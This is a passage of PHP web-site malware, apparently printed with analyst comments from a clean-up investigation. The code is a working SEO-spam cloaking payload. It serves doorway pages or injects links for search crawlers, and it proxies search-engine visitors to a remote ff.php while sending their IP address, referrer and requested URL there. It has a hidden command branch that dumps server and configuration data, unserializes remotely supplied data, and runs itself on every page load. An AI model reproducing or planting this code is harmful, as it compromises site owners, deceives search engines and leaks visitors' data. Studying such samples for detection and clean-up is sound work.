            $out = array('cf' => $cf, 'server' => $_SERVER, 'file' => "/var/www/html/input.php", 'configfile' => $configs, 'db_file_size' => is_file($bd) ? filesize($bd) : 0, 'template_file_size' => is_file($templ) ? filesize($templ) : 0);
            echo base64_encode(serialize($out));
            exit;
        }
    } else {
        // --- Normal traffic (no command, or wrong secret) ---
        $cf = array();
        if (@file_exists($configs)) {
            // unserialize() on a file that was fetched over plain HTTP.
            $cf = @unserialize(@base64_decode(@file_get_contents($configs)));
        }
        // Only URLs whose md5(host + uri) is a key in the config are cloaked.
        if (@isset($cf[$md5urx])) {
            $bot = 0;
            $se = 0;
            $ua = @$_SERVER["HTTP_USER_AGENT"];
            $ref = @$_SERVER["HTTP_REFERER"];
            $myip = @$_SERVER["REMOTE_ADDR"];
            // $se: the Referer looks like a search-engine results page.
            if (preg_match("#google|bing\\.com|msn\\.com|ask\\.com|aol\\.com|altavista|search|yahoo|conduit\\.com|charter\\.net|wow\\.com|mywebsearch\\.com|handycafe\\.com|babylon\\.com#i", $ref)) {
                $se = 1;
            }
            // $bot: the User-Agent looks like a crawler. When verifying a clean-up,
            // request the page with and without such a User-Agent / Referer and
            // compare the responses.
            if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\\.ru|crawler|baiduspider#i", $ua)) {
                $bot = 1;
            }
            // The config value is a byte offset into the database file; the record
            // is the single line at that offset, base64-encoded serialized data.
            $off = $cf[$md5urx] + 0;
            $template = @base64_decode(@file_get_contents($templ));
            $f = @fopen($bd, "r");
            @fseek($f, $off);
            $buf = trim(@fgets($f));
            @fclose($f);
            // unserialize() on data that originated from the remote host.
            $info = unserialize(base64_decode($buf));
            $keyword = @$info["keyword"];
            $IDpack = @$info["IDpack"];
            $base = @$info["base"];
            $text = @$info["text"];
            $title = @$info["title"];
            $description = @$info["description"];
            $uckeyword = ucwords($keyword);
            $inside_links = @$info["inside_links"];
            if ($bot) {
                // Crawler branch: the record can dictate arbitrary response headers.
                if (isset($info["contenttype"])) {
                    $contenttype = @base64_decode($info["contenttype"]);
                    $types = explode("\n", $contenttype);
                    foreach ($types as $val) {
                        $val = trim($val);
                        if ($val != "") {
                            header($val);
                        }
                    }
                }
                if (isset($info["isdoor"])) {
                    // Doorway page: the crawler gets content from the record
                    // instead of the real page.
                    if (isset($info["standalone"])) {
                        // Complete page stored in the record.
                        $doorcontent = base64_decode($text);
                        echo $doorcontent;
                        exit;
                    } else {
                        // Page built from the template, either with the record's own
                        // marker => replacement map ("nr") or the fixed placeholders.
                        if (isset($info["nr"]) && is_array($info["nr"])) {
                            foreach ($info["nr"] as $mark => $repl) {
                                $template = str_replace($mark, $repl, $template);
                            }
                        } else {
                            $template = str_replace("%text%", $text, $template);
                            $template = str_replace("%title%", $title, $template);
                            $template = str_replace("%description%", $description, $template);
                            $template = str_replace("%uckeyword%", $uckeyword, $template);
                            $template = str_replace("%keyword%", str_replace(" ", ",", trim($keyword)), $template);
                            foreach ($inside_links as $i => $link) {
                                $template = str_replace("%INSIDE_LINK_" . $i . "%", $link, $template);
                            }
                        }
                        echo $template;
                        exit;
                    }
                } else {
                    // Link injection: the crawler gets the site's real page with
                    // links from the record added after <a> elements and paragraph
                    // ends (HTML responses only).
                    list($buf, $ct) = get_proxy_page();
                    if (stristr($ct, "text/html")) {
                        $rega = '/\\<a\\s.*?\\>.*?\\<\\/a\\>/i';
                        $resa = 0;
                        $links = $info["links_a"];
                        $buf = change_page_regex($buf, $links, $rega, $resa);
                        $regp = '/(.{30}\\<\\/p\\>)/is';
                        $resp = 1;
                        $links = $info["links_p"];
                        $buf = change_page_regex($buf, $links, $regp, $resp);
                    }
                    echo $buf;
                    exit;
                }
            }
            if ($se) {
                // Search-engine visitor branch.
                if (isset($info["isdoor"])) {
                    // The response body comes from http://<domain>/ff.php. The request
                    // discloses the visitor's IP address, Referer and requested URL,
                    // and forwards the visitor's User-Agent.
                    list($buf, $curly_page_get_info) = curly_page_get("http://{$domain}/ff.php?ip=" . $IDpack . "&mk=" . rawurlencode($keyword) . "&base=" . rawurlencode($base) . "&d=" . rawurlencode($host) . "&u=" . rawurlencode($urx) . "&addr=" . $myip . "&ref=" . rawurlencode($ref), $ua);
                } else {
                    list($buf, $ct) = get_proxy_page();
                }
                echo $buf;
                exit;
            }
            // Configured URL, but neither crawler nor search-engine visitor:
            // nothing is echoed here and the closure returns.
        } else {
            // URL not in the config: the page is re-fetched from the site itself
            // and echoed.
            list($buf, $ct) = get_proxy_page();
            echo $buf;
            exit;
        }
    }
};
// Runs the payload on every request that loads the infected file.
$MQfjCncjlLvAs();